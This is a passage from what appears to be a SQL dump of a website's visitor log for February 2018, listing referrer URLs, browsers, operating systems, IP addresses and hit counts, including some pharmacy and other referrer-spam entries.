10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.81','000',1,0),(20753,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.120','000',1,0),(20754,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.41','000',1,0),(20755,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.21','000',3,0),(20756,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.200','000',1,0),(20757,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.78','000',2,0),(20758,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.112','000',1,0),(20759,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.178','000',1,0),(20760,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',2,0),(20761,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',1,0),(20762,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.187','000',2,0),(20763,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',1,0),(20764,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.123','000',1,0),(20765,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.165','000',2,0),(20766,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.126','000',2,0),(20767,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.73','000',1,0),(20768,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.81','000',1,0),(20769,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.38','000',1,0),(20770,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.209','000',3,0),(20771,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.210','000',2,0),(20772,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.169','000',3,0),(20773,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.116','000',1,0),(20774,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.153','000',2,0),(20775,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.21','000',1,0),(20776,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.91','000',1,0),(20777,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',1,0),(20778,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.121','000',2,0),(20779,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',1,0),(20780,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.239','000',1,0),(20781,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',1,0),(20782,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.216','000',2,0),(20783,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',2,0),(20784,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.192','000',1,0),(20785,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(20786,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',1,0),(20787,'2018-02-10','https://zphiblgz.org','Firefox','Windows','31.0','','23.254.9.15','000',2,0),(20788,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.2','000',1,0),(20789,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',1,0),(20790,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.181','000',2,0),(20791,'2018-02-10','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.8','000',1,0),(20792,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.210','000',1,0),(20793,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.192','000',1,0),(20794,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',1,0),(20795,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.197','000',1,0),(20796,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',3,0),(20797,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',1,0),(20798,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',2,0),(20799,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',1,0),(20800,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.90','000',6,0),(20801,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(20802,'2018-02-10','http://krasivoe-hd.net/','MSIE','Windows','6.0','','37.115.184.155','000',2,0),(20803,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.184','000',2,0),(20804,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',2,0),(20805,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.132','000',1,0),(20806,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',1,0),(20807,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.180','000',1,0),(20808,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(20809,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',1,0),(20810,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',1,0),(20811,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.189','000',3,0),(20812,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.220','000',2,0),(20813,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.119','000',2,0),(20814,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',2,0),(20815,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',2,0),(20816,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.208','000',1,0),(20817,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.68','000',1,0),(20818,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.26','000',1,0),(20819,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.16','000',2,0),(20820,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.15','000',1,0),(20821,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.237','000',1,0),(20822,'2018-02-10','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.22','000',1,0),(20823,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.237','000',1,0),(20824,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',1,0),(20825,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.116','000',1,0),(20826,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.154','000',1,0),(20827,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.165','000',1,0),(20828,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.101','000',2,0),(20829,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.209','000',1,0),(20830,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.245','000',1,0),(20831,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.26','000',1,0),(20832,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.208','000',1,0),(20833,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.187','000',1,0),(20834,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',1,0),(20835,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.118','000',1,0),(20836,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(20837,'2018-02-10','https://zphiblgz.org/scholarship/','Chrome','Windows','63.0.3239.132','','71.121.235.128','000',6,0),(20838,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.115','000',1,0),(20839,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',2,0),(20840,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',2,0),(20841,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.209','000',2,0),(20842,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.194','000',3,0),(20843,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.69','000',3,0),(20844,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',1,0),(20845,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',1,0),(20846,'2018-02-10','https://www.facebook.com/','Safari','Macintosh','11.0.3','','47.200.21.238','000',5,0),(20847,'2018-02-10','https://zphiblgz.org','Chrome','Windows','64.0.3282.140','','71.121.235.128','000',2,0),(20848,'2018-02-10','http://sildenafil-tadalafil.info/','MSIE','Windows','6.0','','46.118.225.78','000',3,0),(20849,'2018-02-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1694.NMQR6uev8ucv1NnGtFyqGfT1WKe5jMkBYZCFSDZk_rt0nlwH7i-H3pXstpjGzLkI.8fe10c4d97deefa60c63dd379d6d755ae391e6ff&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWS0JBYjlYTnVIWVBjVVFsczJUUlN6QjE5U2dZUmo5b3VNZ3h3Smszdy1tWi1XZXQ1REtRaENrNGJjSDVsWVRGTHVXWER0YjhsaEtJaTQ5MW9BWG1wZmRxUWFmZC14VFF5Mi1CdlV3N1FEMk44cnd0a3RQSHVyNE9PVzRBbzlQOEpnR2hRZHJpNTY3NUt5UFRuYnBLS3NDUGxhVGdoYzZoWkMxOUJMLWlsTHhCMzIyU2FteC1xUnR3NkROWjdYYjc0cjdGOTFlMGo1UjZ3TnZ3eERpOGlmOW5jeU9ITTVLZ2NzN2xsZGZMMFlYUUhnZ3h6aE9IbTZW&b64e=2&sign=d8708502cf94f092631f1a6d3bb292ac&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiTuK7neZy1RwKxc0TtdI0gmB7mo91Pnr5ca_auv4UHxM5KNPdSgC7n-G6oPmkRPgII1d7GhpufgD4JpSYaxf-adpRW_8wm0hFEDykOAczf5zLW3MYG_c0CU0a0jLMoV0K&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUano4BEc9IEa8ZHrCn87MxVYwPT0dA2G5CBD73lVxmgVIqZ8L1ITIcNE4mPwZQQV9V5i6aco0BwQ&l10n=ru&cts=1518319974733&mc=3.32461113727','Firefox','Windows','57.0','','176.193.123.202','000',2,0),(20850,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.56','000',1,0),(20851,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.125','000',2,0),(20852,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.117','000',1,0),(20853,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.21','000',1,0),(20854,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.143','000',1,0),(20855,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',2,0),(20856,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',1,0),(20857,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',2,0),(20858,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',1,0),(20859,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',2,0),(20860,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.17','000',1,0),(20861,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',1,0),(20862,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.115','000',2,0),(20863,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.69','000',2,0),(20864,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',1,0),(20865,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',1,0),(20866,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.31','000',2,0),(20867,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.105','000',1,0),(20868,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.245','000',2,0),(20869,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',1,0),(20870,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.214','000',3,0),(20871,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.149','000',1,0),(20872,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.152','000',1,0),(20873,'2018-02-11','https://zphiblgz.org','Safari','iPhone','11.0','','74.72.199.215','000',6,0),(20874,'2018-02-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',4,0),(20875,'2018-02-11','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.185','000',1,0),(20876,'2018-02-11','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(20877,'2018-02-11','https://zphiblgz.org','Safari','iPhone','9.0','','219.142.243.141','000',1,0),(20878,'2018-02-11','https://zphiblgz.org','Safari','iPhone','9.0','','182.119.193.186','000',1,0),(20879,'2018-02-11','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(20880,'2018-02-11','https://pills24h.com/buy-paroxetine-online-without-prescription/','MSIE','Windows','6.0','','46.118.225.78','000',3,0),(20881,'2018-02-11','https://pills24h.com/buy-paroxetine-online-without-prescription/','Opera','Windows','6.0','','37.115.184.155','000',3,0),(20882,'2018-02-11','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(20883,'2018-02-11','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.30','000',1,0),(20884,'2018-02-11','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','23.238.16.86','000',2,0),(20885,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.128','000',1,0),(20886,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',4,0),(20887,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',4,0),(20888,'2018-02-11','http://gezlev.com.ua/','MSIE','Windows','6.0','','37.115.184.155','000',2,0),(20889,'2018-02-11','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','103.28.38.83','000',2,0),(20890,'2018-02-11','https://zphiblgz.org','Safari','iPhone','9.0','','171.117.206.35','000',1,0),(20891,'2018-02-11','https://zphiblgz.org','Safari','iPhone','9.0','','110.177.73.168','000',1,0),(20892,'2018-02-11','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.193','000',1,0),(20893,'2018-02-11','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','192.95.29.116','000',2,0),(20894,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.121','000',2,0),(20895,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.216','000',2,0),(20896,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.246','000',1,0),(20897,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.204','000',1,0),(20898,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.214','000',2,0),(20899,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',1,0),(20900,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.118','000',1,0),(20901,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.217','000',1,0),(20902,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.210','000',1,0),(20903,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.56','000',4,0),(20904,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',1,0),(20905,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',3,0),(20906,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.201','000',1,0),(20907,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.117','000',2,0),(20908,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.77','000',1,0),(20909,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',1,0),(20910,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',2,0),(20911,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.193','000',1,0),(20912,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',2,0),(20913,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',2,0),(20914,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',1,0),(20915,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',1,0),(20916,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.26','000',2,0),(20917,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',1,0),(20918,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',1,0),(20919,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.26','000',1,0),(20920,'2018-02-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(20921,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',3,0),(20922,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.151','000',1,0),(20923,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.148','000',1,0),(20924,'2018-02-11','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.63','000',1,0),(20925,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',2,0),(20926,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.199','000',1,0),(20927,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.165','000',2,0),(20928,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.17','000',1,0),(20929,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.115','000',2,0),(20930,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.164','000',1,0),(20931,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',3,0),(20932,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.61','000',2,0),(20933,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.218','000',1,0),(20934,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',1,0),(20935,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.113','000',1,0),(20936,'2018-02-11','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.99.132.114','000',2,0),(20937,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.86','000',3,0),(20938,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.201','000',2,0),(20939,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.118','000',1,0),(20940,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.82','000',1,0),(20941,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.198','000',1,0),(20942,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.21','000',1,0),(20943,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',1,0),(20944,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.123','000',1,0),(20945,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',1,0),(20946,'2018-02-11','https://zphiblgz.org','Safari','iPhone','11.0','','172.58.184.63','000',2,0),(20947,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.117','000',2,0),(20948,'2018-02-11','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','71.121.167.97','000',2,0),(20949,'2018-02-11','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','50.87.249.190','000',2,0),(20950,'2018-02-11','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.62.74','000',2,0),(20951,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.204','000',5,0),(20952,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.117','000',4,0),(20953,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',1,0),(20954,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.219','000',1,0),(20955,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.83','000',2,0),(20956,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.213','000',1,0),(20957,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.69','000',3,0),(20958,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.193','000',1,0),(20959,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.209','000',1,0),(20960,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.112','000',1,0),(20961,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.88','000',2,0),(20962,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.54','000',1,0),(20963,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.200','000',1,0),(20964,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.101','000',1,0),(20965,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.55','000',1,0),(20966,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.243','000',1,0),(20967,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.118','000',2,0),(20968,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.52','000',1,0),(20969,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.68','000',1,0),(20970,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',1,0),(20971,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.175','000',1,0),(20972,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','95.211.94.107','000',1,0),(20973,'2018-02-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(20974,'2018-02-11','http://5elementov.ru/','Opera','Windows','9.00','','46.119.123.218','000',1,0),(20975,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.70','000',5,0),(20976,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',4,0),(20977,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',1,0),(20978,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.119','000',2,0),(20979,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',5,0),(20980,'2018-02-11','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjKoo-D2Z7ZAhVQMawKHf6gBQoQFggnMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','96.5.120.250','000',9,0),(20981,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.90','000',2,0),(20982,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.217','000',1,0),(20983,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.210','000',1,0),(20984,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.22','000',1,0),(20985,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.204','000',1,0),(20986,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.205','000',1,0),(20987,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.158','000',2,0),(20988,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.215','000',1,0),(20989,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.141','000',2,0),(20990,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.35','000',1,0),(20991,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.246','000',1,0),(20992,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',2,0),(20993,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',1,0),(20994,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.211','000',4,0),(20995,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',1,0),(20996,'2018-02-11','https://zphiblgz.org','Firefox','Windows','40.1','','62.83.64.103','000',2,0),(20997,'2018-02-11','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',1,0),(20998,'2018-02-11','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(20999,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.72','000',1,0),(21000,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.78','000',3,0),(21001,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.196','000',1,0),(21002,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.219','000',2,0),(21003,'2018-02-11','https://www.google.com/','Chrome','Windows','64.0.3282.140','','99.122.197.138','000',2,0),(21004,'2018-02-11','https://zphiblgz.org','Safari','iPhone','11.0','','73.250.70.213','000',1,0),(21005,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.139','000',4,0),(21006,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.145','000',1,0),(21007,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.164','000',1,0),(21008,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',1,0),(21009,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',1,0),(21010,'2018-02-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(21011,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',1,0),(21012,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.217','000',4,0),(21013,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',1,0),(21014,'2018-02-11','https://zphiblgz.org','